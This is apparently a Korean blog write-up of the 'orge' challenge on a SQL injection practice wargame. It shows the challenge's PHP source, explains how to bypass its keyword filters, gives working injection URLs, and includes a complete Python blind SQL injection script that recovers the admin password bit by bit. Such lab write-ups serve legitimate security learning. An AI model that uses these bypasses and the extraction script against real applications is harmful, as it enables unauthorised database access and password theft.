IT보안관의 공부 클라우드


Wargame / los

[los]orge

ㅡㅡㅡㅡㄷ 2021. 5. 25. 18:41

query : select id from prob_orge where id='guest' and pw=''

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>


1. preg_match: prob, _, ., ()
2. preg_match: or, and
3. addslashes (applied only before the second query, so the injection works against the first query; the second query only checks the real admin password)
※ () is caught by preg_match, so why can functions still be called?
   The pattern \(\) only matches the two characters "()" when they are adjacent (an empty argument list). substr(pw,1,1) has arguments between the parentheses, so it is not matched.


This is a blind SQL injection challenge.
query : select id from prob_orge where id='guest' and pw='a' || '1'='1'
Hello guest is printed.

%26 is the URL encoding of &. Since & is the URL parameter separator, it must be encoded to reach the query.
※ When writing it as Python code, use && directly (requests URL-encodes the parameter value).
pw=a' || 1=1 %26%26 id='admin' %26%26 length(pw)='8
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=a%27%20||%201=1%20%26%26%20id=%27admin%27%20%26%26%20length(pw)=%278
Hello admin, so the admin password is 8 characters long.

Technique: use substr, ascii, bin and lpad to turn one password character into a zero-padded 8-digit binary string, then use substr to test one binary digit at a time, so 8 yes/no comparisons reveal one character.
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=a' || 1=1 %26%26 id='admin' %26%26 substr(lpad(bin(ascii(substr(pw,1,1))),8,0),1,1) = '1

Rough loop structure

for i in range(1, 9):        # character position
    bits = ''
    for j in range(1, 9):    # bit position within the 8-bit value
        if oracle("substr(lpad(bin(ascii(substr(pw,i,1))),8,0),j,1) = '1'"):
            bits = bits + '1'
        else:
            bits = bits + '0'
    pw_list.append(bits)

Python code

# orge blind SQL injection solver
# One request per bit: 8 characters x 8 bits = 64 requests.

import requests

url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
# Session cookie of the logged-in challenge account (replace with your own PHPSESSID)
cookies = {'PHPSESSID': '7cu8mcoov0uo0qirli9sk9d38j'}

pw_list = []   # one 8-bit string per password character
pw_str = ''

for i in range(1, 9):          # character position (length(pw) = 8 was confirmed above)
    bits = ''
    for j in range(1, 9):      # bit position within the zero-padded 8-bit value
        # '&&' can be used as-is here: requests URL-encodes the value, so '&' becomes %26
        param = {'pw': "a' || 1=1 && id='admin' && substr(lpad(bin(ascii(substr(pw," + str(i) + ",1))),8,0)," + str(j) + ",1) = '1"}
        res = requests.get(url, cookies=cookies, params=param, verify=False)
        # 'Hello admin' appears only when the bit condition is true -> this bit is 1
        if 'Hello admin' in res.text:
            bits = bits + '1'
        else:
            bits = bits + '0'
    pw_list.append(bits)
    print(pw_list)

for bits in pw_list:
    pw_str = pw_str + chr(int(bits, 2))   # 8-bit string -> character
print('PW:' + pw_str)

 
